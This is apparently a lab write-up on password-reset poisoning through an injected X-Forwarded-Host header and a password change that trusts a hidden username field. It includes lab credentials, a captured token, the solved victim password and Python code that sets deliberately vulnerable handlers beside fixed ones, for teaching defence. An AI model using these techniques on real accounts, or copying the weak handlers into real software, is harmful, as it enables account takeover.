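    token = secrets.token_hex(32)             # 256 random bits, like the page's example token
    RESET_TOKENS[token] = {"user": username, "expires": now + TOKEN_TTL, "used": False}
    return token


def validate_reset_token(token, now=None):
    """Returns the account the token belongs to, or None. Must run on the GET that
    renders the form AND on the POST that submits it."""
    now = time.time() if now is None else now
    rec = RESET_TOKENS.get(token)
    if rec is None or rec["used"] or now > rec["expires"]:
        return None
    return rec["user"]


def reset_password_weak(form, users):
    """The LAB 1 flaw: the token was checked when the form was shown, but the submit
    trusts a 'username' field and never looks at the token again."""
    users[form["username"]] = form["new_password"]
    return True


def reset_password(form, users, now=None):
    """The account comes from the token; the form's 'username' field (if any) is
    ignored, and the token is burnt on first use."""
    token = form.get("token", "")
    user = validate_reset_token(token, now)
    if user is None:
        return False
    RESET_TOKENS[token]["used"] = True
    users[user] = form["new_password"]      # demo: real code stores a password hash
    return True
```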
### LAB-2 Password Reset Poisoning via Proxy (X-Forwarded-For Injection)

#### Site map

![image](https://hackmd.io/_uploads/BydQ55J-0.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/H1RP9q1Z0.png)

#### Identify

![image](https://hackmd.io/_uploads/H1IUgjJZ0.png)

The website -> has a proxy

Attack vector - X-Forwarded-Host (records the client domain)

![image](https://hackmd.io/_uploads/Hk9TfXpZ0.png)

**Confirm defense mechanisms**

The password reset requires a token (email)

**Bypass**

![image](https://hackmd.io/_uploads/BkMHko1bA.png)

If the reset-password domain can be manipulated by our header injection, it may allow us to change the victim's password

#### Exploit

![image](https://hackmd.io/_uploads/rktQXs1bA.png)
![image](https://hackmd.io/_uploads/S1q8nYeZC.png)

```
bx8yy156n1xo1vl84kgdio2hxz6od0kx
```

![image](https://hackmd.io/_uploads/H1_SvikZC.png)
![image](https://hackmd.io/_uploads/BJm6Ds1-C.png)

Solved

## User Password Change Mechanism

Flawed design: some websites use a hidden user value to identify who wants to change the password.

### LAB-3 Passing the Current User Parameter in the Password Change

Your credentials: wiener:peter
Victim's username: carlos

#### Site map

![image](https://hackmd.io/_uploads/BkZA8qgZC.png)

#### Dynamic parameters

![image](https://hackmd.io/_uploads/B1GkPqgWC.png)

#### Identify

**Flawed design**

The password-change request shouldn't pass the current user as a parameter

![image](https://hackmd.io/_uploads/H1W4vcxW0.png)
![image](https://hackmd.io/_uploads/Hk7g65lZC.png)
![image](https://hackmd.io/_uploads/Hy7Mp5l-A.png)

**Confirm defense mechanisms**

**Bypass**

#### Exploit

![image](https://hackmd.io/_uploads/ryh4aqlbR.png)
![image](https://hackmd.io/_uploads/rkEOT9ebA.png)

```
carlos
moscow
```

![image](https://hackmd.io/_uploads/SkenTqlb0.png)

Solved!

<!--
#### Site Map
#### Dynamic Parameters
#### Identify
**Confirm Defense Mechanisms**
**Bypass**
#### Exploit
-->

Owner 侯智晟 meowheckerouo@gmail.com
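The two flaws in the last section (LAB-2 and LAB-3) share one root cause: the server takes a security-relevant value from the request when it should take it from its own configuration or session. As an added example that is not the lab's or the author's code, here is the reset link built from the request's Host/X-Forwarded-Host beside one built from a configured origin, and the password-change handler that trusts a hidden `username` field beside one that uses the session's user; the canonical origin, the form field names and the demo users are constructed, not taken from the labs.

```python
from urllib.parse import urlencode

# Constructed placeholder for the site's real origin (read from configuration in practice).
CANONICAL_ORIGIN = "https://example-shop.test"


def reset_link_weak(headers, token):
    """Behind the lab's proxy the link is assembled from request headers. An injected
    X-Forwarded-Host (or a rewritten Host) is reflected into the victim's email, so the
    token travels to whichever domain was injected. Header names assumed lower-cased."""
    host = headers.get("x-forwarded-host") or headers["host"]
    return f"https://{host}/forgot-password?" + urlencode({"token": token})


def reset_link(headers, token):
    """Fixed: the host never comes from the request, only from configuration."""
    return f"{CANONICAL_ORIGIN}/forgot-password?" + urlencode({"token": token})


def change_password_weak(form, users):
    """LAB-3 flaw: the account is a hidden 'username' field the client controls, and the
    two failure cases produce different messages, so guesses against another account
    are distinguishable. Field names are assumed, not taken from the lab."""
    user = form["username"]
    if users.get(user) != form["current-password"]:
        return "Current password is incorrect"
    if form["new-password-1"] != form["new-password-2"]:
        return "New passwords do not match"
    users[user] = form["new-password-1"]
    return "ok"


def change_password(session, form, users):
    """Fixed: the account is the authenticated session's user, and every failure
    returns the same message."""
    user = session.get("user")
    if user is None:
        return "denied"
    if (users.get(user) != form["current-password"]
            or form["new-password-1"] != form["new-password-2"]):
        return "Could not change password"
    users[user] = form["new-password-1"]     # demo: real code stores a password hash
    return "ok"
```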